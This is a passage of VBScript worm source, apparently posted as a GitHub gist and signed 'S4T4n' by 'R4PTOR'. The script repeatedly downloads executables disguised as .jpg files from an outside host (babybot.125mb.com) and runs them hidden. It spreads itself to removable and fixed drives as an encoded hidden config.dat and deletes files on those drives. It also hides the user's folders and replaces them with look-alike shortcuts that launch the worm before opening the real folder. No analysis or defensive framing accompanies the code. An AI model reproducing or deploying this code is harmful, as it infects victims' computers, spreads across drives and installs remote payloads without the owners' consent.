third = ""&var1&"\kernel\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&var1&"\kernel\explorer.jpg",""&var1&"\kernel\explorer.exe" | |
loFSO.DeleteFile ""&var1&"\kernel\explorer.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"explorer.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\Kernel\explorer.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' update . jpg | |
'--------------------------------------------------------------------------- | |
Set wshshell=createobject("wscript.shell") | |
first = "http://babybot.125mb.com/" | |
secon = "update." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\kernel\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&var1&"\kernel\update.jpg",""&var1&"\kernel\Update.exe" | |
loFSO.DeleteFile ""&var1&"\kernel\update.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"Update.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\kernel\Update.exe""",0,False | |
Else | |
End If | |
' | |
Wend | |
' | |
'--------------------------------------------------------------------------- | |
' !Nf3cT!o|\| Headers | |
'--------------------------------------------------------------------------- | |
' | |
detecterracines | |
Sub detecterracines() | |
' | |
'--------------------------------------------------------------------------- | |
' Usb f() | |
'--------------------------------------------------------------------------- | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set wshshell=createobject("wscript.shell") | |
Dim fso, d, dc, s, n | |
Set dc = fso.Drives | |
For Each d in dc | |
racine = d.Driveletter & ":" | |
u= detectamovibles(root) | |
'msgbox racine | |
If u = "Amovible" Or u = "Fixe" And d.isready And racine <> "A:" Then | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
If fsO.FileExists(""&d&"\config.dat") Then | |
Dim oFso, f | |
Dim ts, nl | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
ts = f.ReadAll '-- Rd File | |
If ""&f.line&"" > 30 Then | |
f.close | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\security"" & attrib -s -h ""%systemdrive%\security\*.dat"" & ren ""%systemdrive%\security\*.dat"" blood.dat & EXIT",0 | |
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\kernel"" & attrib -s -h ""%systemdrive%\kernel\*.dat"" & ren ""%systemdrive%\kernel\*.dat"" r00t3r & attrib +s +h ""%systemdrive%\kernel\*.*"" & EXIT",0 | |
Set oShell = Nothing | |
End If | |
' | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
' | |
ts = f.ReadAll '-- Read File | |
If ""&f.line&"" < 30 Then | |
f.close | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
fso.deletefile(""&d&"\config.dat"),true | |
End If | |
' | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
' | |
ts = f.ReadAll '-- R" File | |
If ""&f.line&"" = 30 Then | |
f.close | |
Dim stFichier | |
Dim oFl | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&d&"\config.dat" | |
Set oFl = oFSO.GetFile(stFichier) | |
Set f = ofso.GetFile(stFichier) | |
fdate = f.DateLastModified | |
fname = f.Name | |
dtDiffFile = DateDiff("d", Now, fdate) | |
If dtDiffFile < 0 Then | |
fso.DeleteFile(stFichier),true | |
Dim oShell | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K cd/d ""%systemdrive%\security"" & copy /b /y blood.dat + & EXIT",0 | |
Set oShell = Nothing | |
End If | |
End If | |
Else | |
' | |
'--------------------------------------------------------------------------- | |
' u|s|b spr34d | |
'--------------------------------------------------------------------------- | |
' | |
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomficl=tmpdir & "\tmp.bat" | |
' msgbox nomfic | |
Set f = fso.OpenTextFile(nomficl, ForWriting , true) | |
f.writeline "del/f/q/a """&d&"\*.vbe"" " | |
f.writeline "del/f/q/a """&d&"\*.lnk"" " | |
f.writeline "del/f/q/a """&d&"\config.dat"" " | |
f.writeline "del/f/q/a """&d&"\autorun.inf"" " | |
f.writeline "del/f/q/a """&d&"\microsoft.dat"" " | |
f.writeline "xcopy /C /H /Y /R """&MyF&""" """&d&"\"" " | |
f.writeline "ren """&d&"\blood.dat"" config.dat " | |
f.writeline "attrib +s +H """&d&"\config.dat"" " | |
f.writeline "del/f/q/a ""%systemdrive%\*.lnk"" " | |
f.writeline "del/f/q/a ""%systemdrive%\autorun.inf"" " | |
f.close | |
' | |
Set variable = createobject("wscript.shell") | |
variable.run ""&nomficl&"" ,0,true | |
fso.DeleteFile nomficl, TRUE | |
' | |
'--------------------------------------------------------------------------- | |
' LNK -- 10ver6on l0l | |
'--------------------------------------------------------------------------- | |
' | |
Const ForWriting = 2 | |
RootFolder = ""&d&"" | |
'Const DestinationFile = "FolderList" | |
Set objFSO = CreateObject("Scripting.FileSystemObject") | |
Set objFolder = objFSO.GetFolder(RootFolder) | |
Set colSubfolders = objFolder.Subfolders | |
For Each objSubfolder in colSubfolders | |
Exit For | |
'wscript.echo objSubfolder.Name | |
Next | |
Set oShell = CreateObject("WScript.Shell") | |
sDesktop = WSHShell.SpecialFolders("Desktop") | |
Set oSLink = WSHShell.CreateShortcut(""&d&"\"&objSubfolder.Name&".lnk") | |
strTarget = oShell.ExpandEnvironmentStrings("%windir%") | |
oSLink.TargetPath = strTarget & "\system32\cmd.exe" | |
oSLink.Arguments = "/c start WScRiPt.EXe /e:VBScRIpt.ENcOdE config.dat & C:\WINDOWS\explorer.exe "&objSubfolder.Name&" " | |
oSLink.WindowStyle = 7 | |
oSLink.IconLocation = "%SystemRoot%\system32\SHELL32.dll,-4" | |
oSLink.Description = ""&d&"" | |
oSLink.Save | |
' | |
'--------------------------------------------------------------------------- | |
' +H | |
'--------------------------------------------------------------------------- | |
On Error Resume Next | |
Set objFSo = CreateObject("scripting.FileSystemObject") | |
Set objFile = objFSo.GetFile(""&d&"\"&objSubfolder.Name&".lnk") | |
' | |
objFile.Attributes = 1 'R0 | |
'* * * * * * * | |
'************* | |
'* * * * * * * | |
Set objFSO = CreateObject("Scripting.FileSystemObject" ) | |
Set objFolder = objFSO.GetFolder(""&d&"\"&objSubfolder.Name&"") | |
objFolder.Attributes = objFolder.Attributes XOR 6 | |
' | |
End If | |
End If | |
Next | |
End Sub | |
' | |
Function detectamovibles(drvpath) | |
Dim fso, d, s, t | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath))) | |
Select Case d.DriveType | |
Case 1: t = "Amovible" | |
Case 2: t = "Fixe" | |
End Select | |
detectamovibles = t | |
End Function | |
' | |
'=========================================================================================' | |
' | |
' C0d3 N4me : S4T4n | |
' Cr34t0r : R4PTOR | |
' Created for personal use , modifications or others are not authorized | |
' For more informations, looking 4 me { - CNG4L on Race } | |
' | |
'=========================================================================================' | |
' | |
'''''|| | |
''''''''''''''''''--------------- . . . . . . . | |
'''''''''''''''''' | |
'''''|| | |
' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment